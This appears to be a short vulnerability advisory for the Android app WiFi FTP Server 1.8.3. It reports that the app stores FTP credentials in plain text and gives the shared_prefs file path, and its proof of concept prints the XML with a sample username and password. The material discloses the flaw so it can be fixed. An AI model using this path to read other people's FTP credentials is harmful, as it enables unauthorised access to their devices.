wifiFTPserver

1. # Exploit Title: WiFi FTP Server 1.8.3 - Credential Disclosure
2. # Date: 2019-04-08
3. # Software Link: https://play.google.com/store/apps/details?id=com.medhaapps.wififtpserver&hl=en
4. # Version: 1.8.3 Android App
5. # Vendor: Medha Apps
6. # Exploit Author: Loc Phan Van
7. # CVE: N/A
8. # Category: Mobile Apps
9. # Tested on: Android 8.1
10.  
11. # Description
12. # WiFi FTP Server 1.8.3 Insecure Data Storage, the result of storing confidential
13. # information insecurely on the system i.e. poor encryption, plain text,
14. # access control issues etc. Attacker can find out username/password of valid user via
15. # /data/data/com.medhaapps.wififtpserver/shared_prefs/com.medhaapps.wififtpserver_preferences.xml
16.  
17. # PoC
18.  
19. <?xml version='1.0' encoding='utf-8' standalone='yes' ?>
20. <map>
21. <string name="pref_mount">0</string>
22. <string name="pref_theme">0</string>
23. <boolean name="pref_show_password" value="true" />
24. <boolean name="perf_ftps" value="false" />
25. <string name="pref_port">2221</string>
26. <boolean name="perf_anon" value="false" />
27. <string name="pref_userid">enderphan</string>
28. <string name="pref_password">P4sswr0d123</string>
29. <string name="pref_ssl_mode">0</string>
30. <boolean name="pref_read_only" value="false" />
31. </map>